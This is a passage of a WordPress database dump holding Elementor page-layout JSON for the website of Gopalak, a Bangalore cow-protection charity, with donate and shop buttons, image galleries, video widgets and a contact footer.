/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11343,1887,'_elementor_page_assets','a:0:{}'),(11345,1888,'_elementor_edit_mode','builder'),(11346,1888,'_elementor_template_type','wp-page'),(11347,1888,'_elementor_version','3.7.8'),(11348,1888,'_wp_page_template','elementor_canvas'),(11349,1888,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\